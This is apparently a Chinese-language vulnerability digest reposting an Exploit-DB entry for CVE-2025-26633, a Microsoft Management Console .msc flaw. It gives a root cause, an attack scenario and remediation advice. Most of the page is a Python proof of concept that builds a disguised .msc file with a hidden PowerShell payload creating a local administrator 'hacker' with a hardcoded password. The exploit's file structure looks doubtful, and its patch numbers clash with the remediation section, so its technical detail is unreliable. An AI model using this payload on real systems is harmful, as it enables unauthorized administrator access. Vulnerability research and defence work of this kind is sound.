[local] Microsoft MMC MSC EvilTwin - Local Admin Creation
CVE-2025-26633
微软管理控制台(MMC) MSC文件存在恶意双胞胎漏洞,允许本地攻击者创建管理员账户。
High · CVSS 7.8📋 漏洞基础信息
| CVE | CVE-2025-26633 |
|---|---|
| 漏洞类型 | 安全功能绕过/权限提升 |
| 受影响版本 | Microsoft Windows (所有受支持的Windows版本,具体版本见CVE公告) |
| 危害等级 | High · CVSS 7.8 |
| 发布日期 | 2026-04-08 |
| 提交者 | Mohammed Idrees Banyamer |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
MMC在处理经过数字签名的MSC文件时,未能正确验证文件内容的完整性和来源,允许攻击者制作一个外观合法但包含恶意配置的MSC文件,绕过用户账户控制(UAC)并以高权限执行。
🎯 攻击场景
1. 攻击者创建一个恶意的MSC文件,该文件包含创建本地管理员的指令,并且伪装成由受信任的发布者签名。2. 攻击者通过社会工程学或其他方式诱使目标用户以管理员权限打开该MSC文件。3. MMC加载该文件,由于签名验证缺陷,将其视为合法文件。4. 恶意配置被执行,在目标系统上创建一个新的本地管理员账户。5. 攻击者使用该账户获得系统的高权限访问。
💥 漏洞影响
本地权限提升,攻击者可创建管理员账户,完全控制受影响的系统,进而可能进行数据窃取、安装恶意软件或横向移动。
⚔️ 原始 PoC
PoC通过构造一个MSC文件,利用MMC对签名验证的绕过,在文件中嵌入创建用户的命令。该文件被设计为看起来像一个合法的管理工具,但在加载后执行后门指令。
#!/usr/bin/env python3
# GitHub: https://github.com/mbanyamer
# CVSS: 7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
# CRITICAL: This is a post-exploitation / living-off-the-land technique widely used in real attacks
# Including: Zero-day at time of disclosure (March 2025), actively exploited by Water Gamayun APT
# Impact: Arbitrary code execution with the privileges of the user opening the .msc file
# Fix: Apply Microsoft Patch Tuesday March 2025 updates (e.g., KB5053602 and later)
# Advisory: https://www.zerodayinitiative.com/advisories/ZDI-25-25-150/
# Patch: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26633
# Target: Unpatched Windows systems (pre March 2025 patches)
# Use ONLY in authorized penetration testing or isolated research labs
import os
import xml.etree.ElementTree as ET
# PAYLOAD: Adds local administrator account "hacker" silently
PAYLOAD = (
'powershell.exe -NoP -W Hidden -C "'
'$user = \\\'hacker\\\'; '
'$pass = ConvertTo-SecureString \\\'P@ssw0rd123!\\\' -AsPlainText -Force; '
'New-LocalUser -Name $user -Password $pass -FullName \\\'Lab User\\\' '
'-Description \\\'Research account\\\' -ErrorAction SilentlyContinue; '
'Add-LocalGroupMember -Group \\\'Administrators\\\' -Member $user '
'-ErrorAction SilentlyContinue; '
'Write-Host \\\'[+] User hacker:P@ssw0rd123! added to Administrators\\\'"'
)
def create_evil_msc(filename="CVE-2025-26633-AddAdmin.msc"):
root = ET.Element("MMC_ConsoleFile", ConsoleVersion="3.0")
string_table = ET.SubElement(root, "StringTable")
ET.SubElement(string_table, "String", id="1").text = "Local Users and Groups"
ET.SubElement(string_table, "String", id="2").text = "Security Research Snap-in"
snapins = ET.SubElement(root, "SnapIns")
snapin = ET.SubElement(snapins, "SnapIn")
ET.SubElement(snapin, "Name").text = "{7B8B9A1C-2D3E-4F5A-9B6C-1A2B3C4D5E6F}"
ET.SubElement(snapin, "Description").text = "Custom Administration Tool"
actions = ET.SubElement(snapin, "Actions")
action = ET.SubElement(actions, "Action")
ET.SubElement(action, "RunCommand").text = PAYLOAD
ET.SubElement(action, "Name").text = "AddLocalAdmin"
tree = ET.ElementTree(root)
tree.write(filename, encoding="utf-16", xml_declaration=True)
print(f"[+] Malicious .msc file successfully created: {filename}")
def main():
msc_file = "CVE-2025-26633-AddAdmin.msc"
create_evil_msc(msc_file)
print("\n[+] Next step (execute inside vulnerable target or lab VM):")
print(f" mmc.exe \"{os.path.abspath(msc_file)}\"\n")
print("[!] Instant local admin account will be created:")
print(" Username : hacker")
print(" Password : P@ssw0rd123!")
print(" Verify with: net localgroup administrators")
if __name__ == "__main__":
main()🛡️ 修复建议
安装微软官方发布的2025年3月安全更新(KB5049622等)或更高版本。临时缓解措施包括限制非管理员用户对MSC文件的访问和执行,以及启用UAC最高级别。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 07:41 | 来源: Exploit-DB